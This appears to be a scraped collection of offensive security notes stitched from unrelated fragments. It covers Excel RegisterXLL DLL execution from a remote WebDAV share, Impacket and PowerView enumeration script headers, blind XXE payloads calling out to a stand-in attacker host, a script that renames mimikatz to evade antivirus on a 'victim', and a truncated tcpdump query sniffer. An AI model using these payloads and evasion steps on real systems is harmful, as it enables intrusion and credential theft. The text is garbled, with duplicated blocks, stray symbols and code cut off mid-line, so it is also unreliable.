Matthew Linney Taius

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

	#!/usr/bin/env python
	#
	# Title: lookupadmins.py
	# Author: @ropnop
	# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
	# Similar in function to Get-NetLocalGroup from Powerview
	# Won't work against Windows 10 Anniversary Edition unless you already have local admin
	# See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016
	#
	# Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket

	# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
	# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

	# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
	# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

	# New function naming schema:
	# Verbs:
	# Get : retrieve full raw data sets
	# Find : ‘find’ specific data entries in a data set


	.
	..
	........
	@
	*
	.
	..*
	ðŸŽ

	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>

	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>

	Content-Type: text/xml

	<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxetestd [<!ENTITY xxetest SYSTEM "http://attacker/test.dtd">]><foo>&xxetest;</foo>

	# This script downloads and slightly "obfuscates" the mimikatz project.
	# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ...,
	# so removing them from the project before compiling gets us past most of the AV solutions.
	# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
	# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

	git clone https://github.com/gentilkiwi/mimikatz.git windows
	mv windows/mimikatz windows/windows
	find windows/ -type f -print0 \| xargs -0 sed -i 's/mimikatz/windows/g'
	find windows/ -type f -print0 \| xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'

	# https://www.percona.com/blog/2008/11/07/poor-mans-query-logging/

	tcpdump -i eth0 -s 0 -l -w - dst port 3306 \| strings \| perl -e '
	while(<>) { chomp; next if /^[^ ]+[ ]*$/;
	if(/^(SELECT\|UPDATE\|DELETE\|INSERT\|SET\|COMMIT\|ROLLBACK\|CREATE\|DROP\|ALTER)/i) {
	if (defined $q) { print "$q\n"; }
	$q=$_;
	} else {
	$_ =~ s/^[ \t]+//; $q.=" $_";
	}